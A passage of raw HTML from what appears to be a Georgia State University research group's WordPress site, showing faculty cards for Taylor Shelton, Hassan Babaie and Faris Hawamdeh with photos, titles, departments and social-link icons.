1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c64-outer\">\n            <div data-colibri-id=\"182-c64\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c64 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c65\" class=\"d-block style-973 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Faris-e1697216253732.jpg\" class=\"wp-image-1814 style-973-image style-local-182-c65-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c65-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-974 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Faris Hawamdeh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-975 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Academic Professional\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"h-text h-text-component style-976 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c69\" class=\"style-977 style-local-182-c69 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/faris-hawamdeh/?trk=public_profile_publication_contributor-image\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/faris-hawamdeh/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 